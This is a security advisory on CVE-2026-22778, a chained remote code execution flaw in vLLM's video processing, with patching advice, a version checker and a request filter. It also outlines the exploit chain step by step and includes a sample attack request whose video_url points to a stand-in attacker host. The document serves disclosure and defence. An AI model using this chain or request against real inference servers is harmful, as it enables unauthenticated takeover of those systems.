
A critical pre-authenticated remote code execution (RCE) vulnerability, tracked as CVE-2026-22778 (CVSS 9.8), has been discovered in vLLM, a widely used inference and serving engine for large language models.
Publicly exposed vLLM deployments running video models are vulnerable to full server compromise. An attacker can trigger the flaw by submitting a malicious video link to vLLM’s API, resulting in arbitrary command execution on the underlying system without authentication.
The vulnerability affects vLLM versions 0.8.3 through 0.14.0 and stems from two chained weaknesses: an information disclosure flaw in error handling and a heap buffer overflow in a bundled video decoding dependency. Exploited together, these weaknesses allow attackers to bypass memory protections and gain code execution within the vLLM process.
While the issue is limited to deployments that enable multimodal video processing, the default exposure model of vLLM makes this vulnerability particularly dangerous for internet-facing inference services.
Affected Versions
vLLM versions 0.8.3 through 0.14.0 are affected; the fix ships in v0.14.1.
Immediate Actions
- Upgrade to vLLM v0.14.1 or later.
- Verify OpenCV is updated to a patched version.
- Reduce exposure of inference APIs by blocking multimodal requests containing a `video_url` parameter to the following endpoints:
  - `POST /v1/chat/completions`
  - `POST /v1/invocations`
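Whether a deployment falls in the affected range can be checked with a quick script. The sketch below is a minimal illustration: the range logic follows the advisory (0.8.3 through 0.14.0, fixed in 0.14.1), and the version parser assumes simple dotted release strings (pre-release suffixes would need extra handling).

```python
def parse_version(v: str) -> tuple:
    """Parse a simple dotted version string (e.g. '0.14.0') into a comparable tuple."""
    return tuple(int(part) for part in v.split("."))


def is_vulnerable(vllm_version: str) -> bool:
    """True if the version falls in the affected range 0.8.3 <= v <= 0.14.0."""
    v = parse_version(vllm_version)
    return parse_version("0.8.3") <= v <= parse_version("0.14.0")


if __name__ == "__main__":
    try:
        from importlib.metadata import version
        installed = version("vllm")
        status = "AFFECTED - upgrade to 0.14.1+" if is_vulnerable(installed) else "not in affected range"
        print(f"vllm {installed}: {status}")
    except Exception:
        print("vllm is not installed in this environment")
```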
If You Can’t Patch Immediately
- Disable video and multimodal endpoints.
- Restrict access to inference APIs to trusted internal users or services.
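At the gateway layer, the workaround above can be approximated by rejecting any request body to the affected endpoints that carries a `video_url` field before it reaches vLLM. This is a hedged sketch of the filtering logic only, not a full middleware; the endpoint paths come from the advisory, and the recursive key search is deliberately broad:

```python
import json

# Endpoints named in the advisory as reachable via multimodal video requests.
BLOCKED_PATHS = {"/v1/chat/completions", "/v1/invocations"}


def contains_video_url(obj) -> bool:
    """Recursively search a decoded JSON body for any 'video_url' key."""
    if isinstance(obj, dict):
        return "video_url" in obj or any(contains_video_url(v) for v in obj.values())
    if isinstance(obj, list):
        return any(contains_video_url(item) for item in obj)
    return False


def should_block(path: str, raw_body: bytes) -> bool:
    """Block multimodal video requests to the affected endpoints."""
    if path not in BLOCKED_PATHS:
        return False
    try:
        body = json.loads(raw_body)
    except ValueError:
        return True  # fail closed on unparseable bodies to these endpoints
    return contains_video_url(body)
```

A reverse proxy or WAF rule matching the same key achieves the equivalent effect without touching application code.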
What is vLLM?
vLLM is an open-source, high-throughput inference engine designed to efficiently serve large language models across cloud and self-hosted environments. It is widely adopted for running LLMs at scale due to its performance and memory efficiency, particularly under concurrent workloads.
As vLLM adoption has expanded beyond text-only inference to support multimodal inputs such as images and video, it has become increasingly exposed through public-facing APIs. This expanded attack surface is central to CVE-2026-22778, which affects deployments that enable video processing.
By chaining an information disclosure flaw with a heap buffer overflow in a bundled video decoding dependency, an unauthenticated attacker can achieve arbitrary code execution on vulnerable vLLM systems.
Technical Details
CVE-2026-22778 is not a single bug, but a chained exploit that combines an information disclosure issue with a heap-based buffer overflow in vLLM’s video processing pipeline. The exploit unfolds across multiple layers of the inference stack as follows:
- API request handling: An attacker sends a request to vLLM’s Completions or Invocations API containing a `video_url`, triggering the multimodal video processing path without requiring authentication.
- Video ingestion via OpenCV: vLLM processes the supplied video using OpenCV’s `cv2.VideoCapture()` interface, which delegates decoding to a bundled FFmpeg library.
- JPEG2000 decoding in FFmpeg: FFmpeg invokes the JPEG2000 decoder `libopenjp2` to parse video frames, trusting attacker-controlled metadata embedded in the file structure.
- Heap buffer overflow through a crafted `cdef` box: A malicious JPEG2000 file abuses the channel definition (`cdef`) box to remap image channels without validating buffer sizes, causing a heap-based buffer overflow during decoding.
- Function pointer corruption: The overflow overwrites adjacent heap memory, including a function pointer used by the decoder or cleanup routines.
- Arbitrary code execution: When the corrupted function pointer is later dereferenced, execution flow is redirected, resulting in arbitrary code execution within the vLLM process.
When chained together, these flaws allow reliable, unauthenticated remote code execution on vLLM deployments that enable video processing.
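For illustration, the entry point is an ordinary-looking chat request. The sketch below shows the general shape of a multimodal payload that reaches the video path. The field names follow the OpenAI-style content-part convention; the exact schema accepted may vary across vLLM versions, and the model name and URL here are placeholders, not a working exploit:

```python
import json

# Hypothetical request body: a standard chat completion whose content parts
# include a video_url entry. The URL is a placeholder controlled by the attacker.
payload = {
    "model": "some-video-capable-model",  # placeholder model name
    "messages": [{
        "role": "user",
        "content": [
            {"type": "text", "text": "Describe this video."},
            {"type": "video_url", "video_url": {"url": "http://attacker.example/clip.mp4"}},
        ],
    }],
}

# The server fetches and decodes the referenced video server-side; on a default
# deployment no authentication is required, which is what makes the path reachable.
body = json.dumps(payload)
```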
Information Disclosure through Error Handling
When vLLM receives malformed image or video input, it relies on Python imaging libraries to parse the data. In vulnerable versions, error messages generated during this process are returned directly to the client.
These error messages can include raw object representations containing heap memory addresses, for example:
`cannot identify image file <_io.BytesIO object at 0x7a95e299e750>`

This leaks precise memory addresses from the vLLM process. Address Space Layout Randomization (ASLR) is a key defense against memory corruption exploits. By leaking heap addresses, vLLM effectively hands attackers the information needed to bypass ASLR and precisely target memory locations during exploitation.
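The leak itself is just Python’s default object repr. The following stdlib-only sketch reproduces the behavior and shows how trivially the heap address can be parsed out of such an error string:

```python
import io
import re

# Python's default repr for a BytesIO includes its heap address,
# e.g. "<_io.BytesIO object at 0x7a95e299e750>".
err = f"cannot identify image file {io.BytesIO(b'not-an-image')!r}"

# Recovering the address from the error response takes one regex.
match = re.search(r"0x[0-9a-fA-F]+", err)
leaked_addr = int(match.group(0), 16) if match else None
print(hex(leaked_addr))
```

Any error path that returns `repr()` of live objects to untrusted clients carries the same risk, which is why sanitizing error responses matters even in memory-safe languages.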
Heap Buffer Overflow in Video Decoding
The second flaw resides in vLLM’s video processing pipeline. When handling video inputs, vLLM uses OpenCV, which in turn relies on FFmpeg for decoding.
In affected versions, a vulnerability in FFmpeg’s JPEG2000 decoder allows a specially crafted video file to trigger a heap buffer overflow. The overflow occurs when pixel data is written beyond the bounds of an allocated buffer, overwriting adjacent memory structures.
In practice, this overflow can overwrite function pointers used during memory cleanup. Once control flow is redirected, the attacker can execute arbitrary commands within the vLLM process.
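Defensively, suspicious inputs can be triaged before they ever reach the decoder. JPEG 2000 files are a sequence of length-prefixed boxes (4-byte big-endian size, then a 4-byte type tag), with the channel definition box nested inside the `jp2h` header box. The sketch below is a crude triage heuristic under those assumptions, not a spec-complete parser: it flags any input carrying a `cdef` box for closer review, and it does not handle extended-length boxes.

```python
import struct

SUPERBOXES = {b"jp2h"}  # container boxes whose payload is itself a box stream


def box_types(data: bytes):
    """Walk a JP2 box stream (4-byte big-endian length + 4-byte type tag),
    recursing into known container boxes."""
    types, offset = [], 0
    while offset + 8 <= len(data):
        (length,) = struct.unpack(">I", data[offset:offset + 4])
        box_type = data[offset + 4:offset + 8]
        if length == 0:      # length 0 means "box extends to end of data"
            length = len(data) - offset
        elif length < 8:     # extended (XLBox) lengths not handled in this sketch
            break
        types.append(box_type)
        if box_type in SUPERBOXES:
            types.extend(box_types(data[offset + 8:offset + length]))
        offset += length
    return types


def has_cdef_box(data: bytes) -> bool:
    """Flag inputs carrying a channel definition (cdef) box for closer review."""
    return b"cdef" in box_types(data)
```

A `cdef` box is legitimate in many files, so this is a review filter rather than a block rule; the robust fix remains patching the decoder itself.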
Chained Exploitation: From Input to Code Execution
An attacker can combine these two flaws into a reliable exploit chain:
- Send a malformed image or video to trigger an error response.
- Extract leaked heap addresses from the error message.
- Send a crafted JPEG2000 video payload.
- Use the known memory layout to overwrite function pointers.
- Achieve arbitrary code execution without authentication.
No credentials are required, and the attack can be carried out remotely against exposed vLLM endpoints.
Why This Matters for AI Security
CVE-2026-22778 highlights a growing reality: AI infrastructure inherits the full risk surface of traditional software stacks, including memory corruption, dependency vulnerabilities, and unsafe error handling.
As AI systems expand beyond text into images, video, and agent-driven workflows, these risks compound. Security controls must extend beyond model behavior to the infrastructure that serves them.
References
- GitHub Security Advisory. (2026, February 2). GHSA-4r2x-xpjr-7cvv: Remote code execution in vLLM via malicious video processing. GitHub. https://github.com/advisories/GHSA-4r2x-xpjr-7cvv
- National Vulnerability Database (NVD). (2026). CVE-2026-22778: Remote code execution in vLLM. National Institute of Standards and Technology. https://nvd.nist.gov/vuln/detail/CVE-2026-22778
- OX Security Research Team. (2026, February 2). CVE-2026-22778: vLLM RCE vulnerability analysis. OX Security Blog. https://www.ox.security/blog/cve-2026-22778-vllm-rce-vulnerability/
- Underhill, K. (2026, February 2). Critical vLLM flaw puts AI systems at risk of remote code execution. eSecurity Planet. https://www.esecurityplanet.com/artificial-intelligence/critical-vllm-flaw-puts-ai-systems-at-risk-of-remote-code-execution/
- Schwake, E. (2025, December 5). Critical vLLM flaw exposes the soft underbelly of AI infrastructure. Salt Security Blog. https://salt.security/blog/critical-vllm-flaw-exposes-the-soft-underbelly-of-ai-infrastructure